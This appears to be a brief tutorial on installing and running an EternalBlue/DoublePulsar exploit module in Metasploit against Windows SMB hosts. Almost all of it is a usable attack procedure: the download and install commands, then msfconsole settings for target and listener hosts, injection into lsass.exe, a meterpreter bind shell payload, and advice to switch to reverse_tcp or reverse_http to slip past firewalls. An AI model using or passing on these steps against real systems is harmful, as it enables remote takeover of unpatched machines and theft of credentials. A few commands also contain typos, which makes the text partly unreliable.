Installation

You need to take these steps to set up Eternalblue and Doublepulsar with Metasploit, e.g. on Kali.

• wget https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit/archive/master.zip -o ebdp.zip
• unzip ebdp.zip
• rm ebdp.zip
• cd Eternalblue-Doublepulsar-Metasploit
• cp eternalblue_doublepulsar.zip /usr/share/metasploit-framework/modules/exploits/windows/smb/

You’ll need to install 32-bit WINE. This differs over the distributions. For Debian/Ubuntu/Kali, it’s dpkg --add-architecture i386 && apt-get update && apt-get install wine32. On some installations, it’s required to run a WINE application once, so that the directories are created. For example: wine taskmgr.exe.

Running

To run the exploit, enter these commands into msfconsole:

• use exploit/windows/smb/eternalblue_doublepulsar
• set ETERNALBLUEPATH '$(pwd)/deps'
• set DOUBLEPULSARPATH '$(pwd)/deps'
• set PROCESSINJECT lsass.exe, if you target x86_64 systems
• set TARGETARCHITECTURE x64, if you target x86_64 systems
• set WINEPATH /home/$(whoami/.wine/drive_c, if you are not executing msfconsole as root.
• set LHOST 10.x.x.x and set RHOST 10.x.x.x accordingly.
• set PAYLOAD windows/meterpreter/x64/bind_tcp. Remove the x64/ part if you’re not targetting x86_64.

It’s sometimes helpful to switch between payloads, as some traffic or ports may be blocked by firewalls. Try reverse_tcp, reverse_http, ... in that case.

Enjoy.